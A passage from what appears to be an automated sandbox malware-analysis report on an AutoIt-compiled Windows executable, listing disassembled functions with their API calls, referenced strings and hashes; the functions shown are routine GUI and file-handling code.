                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction ID: e03eabf31862ddab4332bf201820cb1c95a7c776cf7f95d6b683a1f4eba65b58
                                                                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                      • Instruction Fuzzy Hash: ECC172322451D309DB2D463B883453FBAA15FA27B231A076ED4B2CB2E4EE38D9659614
                                                                                                                      Function 00537806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0053785B
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0053786D
                                                                                                                      • DestroyWindow.USER32 ref: 0053787B
                                                                                                                      • GetDesktopWindow.USER32 ref: 00537895
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0053789C
                                                                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005379DD
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005379ED
                                                                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537A35
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00537A41
                                                                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00537A7B
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537A9D
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537AB0
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537ABB
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00537AC4
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537AD3
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00537ADC
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537AE3
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00537AEE
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537B00
                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00552CAC,00000000), ref: 00537B16
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00537B26
                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00537B4C
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00537B6B
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537B8D
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537D7A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                      • Opcode ID: 710469d6dc8cb4f1cbd2c63bd0b2c45ab5dacac7900558e6927ce0596ff0460d
                                                                                                                      • Instruction ID: 0030932cbb1ba87c128c4aee26f22f2e59d208aaa6958636d868dabe45a6e6b7
                                                                                                                      • Opcode Fuzzy Hash: 710469d6dc8cb4f1cbd2c63bd0b2c45ab5dacac7900558e6927ce0596ff0460d
                                                                                                                      • Instruction Fuzzy Hash: E1029D79900109EFDB14DFA8DC89EAE7BB9FF49314F008159F905AB2A1DB34AD05DB60
                                                                                                                      Function 0054A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0054A630
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0054A661
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0054A66D
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0054A687
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0054A696
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0054A6C1
                                                                                                                      • GetSysColor.USER32(00000010), ref: 0054A6C9
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0054A6D0
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 0054A6DF
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0054A6E6
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0054A731
                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 0054A763
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0054A78E
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColor.USER32(00000012), ref: 0054A903
                                                                                                                        • Part of subcall function 0054A8CA: SetTextColor.GDI32(?,?), ref: 0054A907
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColorBrush.USER32(0000000F), ref: 0054A91D
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColor.USER32(0000000F), ref: 0054A928
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColor.USER32(00000011), ref: 0054A945
                                                                                                                        • Part of subcall function 0054A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0054A953
                                                                                                                        • Part of subcall function 0054A8CA: SelectObject.GDI32(?,00000000), ref: 0054A964
                                                                                                                        • Part of subcall function 0054A8CA: SetBkColor.GDI32(?,00000000), ref: 0054A96D
                                                                                                                        • Part of subcall function 0054A8CA: SelectObject.GDI32(?,?), ref: 0054A97A
                                                                                                                        • Part of subcall function 0054A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0054A999
                                                                                                                        • Part of subcall function 0054A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0054A9B0
                                                                                                                        • Part of subcall function 0054A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0054A9C5
                                                                                                                        • Part of subcall function 0054A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0054A9ED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3521893082-0
                                                                                                                      • Opcode ID: 2d6d617c8e4677ffc2c18970ea7d08140f49f507ebea8a82bfe0cb1db01d642e
                                                                                                                      • Instruction ID: df4cde58f4fd05e02affccf39e06eae3d98d6bd76fbd1b4a9869bc461bf1822e
                                                                                                                      • Opcode Fuzzy Hash: 2d6d617c8e4677ffc2c18970ea7d08140f49f507ebea8a82bfe0cb1db01d642e
                                                                                                                      • Instruction Fuzzy Hash: D0919C76408301EFD7509F68DC08ADB7BB9FF89329F100A29F962961A1D730D848DB52
                                                                                                                      Function 005374AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 005374DE
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0053759D
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 005375DB
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 005375ED
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00537633
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0053763F
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00537683
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00537692
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 005376A2
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005376A6
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 005376B6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005376BF
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 005376C8
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005376F4
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0053770B
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00537746
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0053775A
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0053776B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0053779B
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 005377A6
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005377B1
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 005377BB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: a384c2197ffe7d1d4073c7b3c34bbf2f8fd5762486ea0075a3c6c0382e4b880e
                                                                                                                      • Instruction ID: 935154d6dd49a0f7dec0caa46b06536f090c5d616196995b30050c13f6655063
                                                                                                                      • Opcode Fuzzy Hash: a384c2197ffe7d1d4073c7b3c34bbf2f8fd5762486ea0075a3c6c0382e4b880e
                                                                                                                      • Instruction Fuzzy Hash: C5A1B575A40209BFEB14DBA8DC4AFAE7B79FB19714F004118FA05A72E0DB74AD04DB64
                                                                                                                      Function 0052AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0052AD1E
                                                                                                                      • GetDriveTypeW.KERNEL32(?,0054FAC0,?,\\.\,0054F910), ref: 0052ADFB
                                                                                                                      • SetErrorMode.KERNEL32(00000000,0054FAC0,?,\\.\,0054F910), ref: 0052AF59
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: de4cd820cf7e2372823b0a5d47f4959d65c80fdb37e6081605f716c321d267c8
                                                                                                                      • Instruction ID: 714e2f15b8205ef7db5cb6bfe3d550037c65e8d1def2edabcc9ad7b8f3cca418
                                                                                                                      • Opcode Fuzzy Hash: de4cd820cf7e2372823b0a5d47f4959d65c80fdb37e6081605f716c321d267c8
                                                                                                                      • Instruction Fuzzy Hash: D551D6B9684215EBCB00DB10FA46DBD7F61FF4A714720845BE40BA72D0EA399D01EB53
                                                                                                                      Function 004C68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      • Opcode ID: a8ccf53f88b9750aa45a4c5e39614849e7585b59d78fc4fb242cefb3130eccfb
                                                                                                                      • Instruction ID: ef25370bae40fb9cd4c243bd5d080758b74136e6ff62b29c02d6201d8108dd05
                                                                                                                      • Opcode Fuzzy Hash: a8ccf53f88b9750aa45a4c5e39614849e7585b59d78fc4fb242cefb3130eccfb
                                                                                                                      • Instruction Fuzzy Hash: 618119B46002056ACB11AE62DC46FBF3B68AF05706F04802FFD056B192EB79D945C65D
                                                                                                                      Function 00549A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00549AD2
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00549B8B
                                                                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00549BA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2326795674-4108050209
                                                                                                                      • Opcode ID: ad6a4d7c5adfd36c65b6e1a7bbf1720b909df32ec2117a45deb15f698c43273a
                                                                                                                      • Instruction ID: b130c1b5c376355681792dfa3f106e9d9db8842daa0248629471cce94ddcd336
                                                                                                                      • Opcode Fuzzy Hash: ad6a4d7c5adfd36c65b6e1a7bbf1720b909df32ec2117a45deb15f698c43273a
                                                                                                                      • Instruction Fuzzy Hash: 1B02CE70104201AFD725CF24C88ABEBBFE5FF99318F04892DF999962A1C774D858DB52
                                                                                                                      Function 0054A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 0054A903
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0054A907
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0054A91D
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0054A928
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 0054A92D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0054A945
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0054A953
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0054A964
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0054A96D
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0054A97A
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0054A999
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0054A9B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0054A9C5
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0054A9ED
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0054AA14
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0054AA32
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 0054AA3D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0054AA4B
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0054AA53
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0054AA67
                                                                                                                      • SelectObject.GDI32(?,0054A5FA), ref: 0054AA7E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0054AA89
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0054AA8F
                                                                                                                      • DeleteObject.GDI32(?), ref: 0054AA94
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0054AA9A
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0054AAA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996641542-0
                                                                                                                      • Opcode ID: 59e885a670d10639bfe6cae1582e56f35acc94c590f4ee7fdf78b6a58f1368e2
                                                                                                                      • Instruction ID: a51c1a58a98d54106db3667775f2990c4c2003af49c23887317b12487fb2644f
                                                                                                                      • Opcode Fuzzy Hash: 59e885a670d10639bfe6cae1582e56f35acc94c590f4ee7fdf78b6a58f1368e2
                                                                                                                      • Instruction Fuzzy Hash: 84515975900208EFDB109FA8DC48EEEBBB9FB09324F114625F911AB2A1D7719944EF90
                                                                                                                      Function 005489D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00548AC1
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00548AD2
                                                                                                                      • CharNextW.USER32(0000014E), ref: 00548B01
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00548B42
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00548B58
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00548B69
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00548B86
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00548BD8
                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00548BEE
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00548C1F
                                                                                                                      • _memset.LIBCMT ref: 00548C44
                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00548C8D
                                                                                                                      • _memset.LIBCMT ref: 00548CEC
                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00548D16
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00548D6E
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00548E1B
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00548E3D
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00548E87
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00548EB4
                                                                                                                      • DrawMenuBar.USER32(?), ref: 00548EC3
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00548EEB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                      • Opcode ID: 11c456bf864705e565acdedcb64e9b62741abb555218f7c41d9874739eea1e91
                                                                                                                      • Instruction ID: 24154dc1ddc62e5db25cbf3d488cdb636c7e7617731daa0f6f5fe7c0d15b8ab2
                                                                                                                      • Opcode Fuzzy Hash: 11c456bf864705e565acdedcb64e9b62741abb555218f7c41d9874739eea1e91
                                                                                                                      • Instruction Fuzzy Hash: 3EE17E74901208AFDB209F55CC84EFE7FB9FF06768F10815AF915AA290DBB49984DF60
                                                                                                                      Function 0054488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 005449CA
                                                                                                                      • GetDesktopWindow.USER32 ref: 005449DF
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 005449E6
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00544A48
                                                                                                                      • DestroyWindow.USER32(?), ref: 00544A74
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00544A9D
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00544ABB
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00544AE1
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00544AF6
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00544B09
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00544B29
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00544B44
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00544B58
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00544B70
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00544B96
                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00544BB0
                                                                                                                      • CopyRect.USER32(?,?), ref: 00544BC7
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00544C32
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
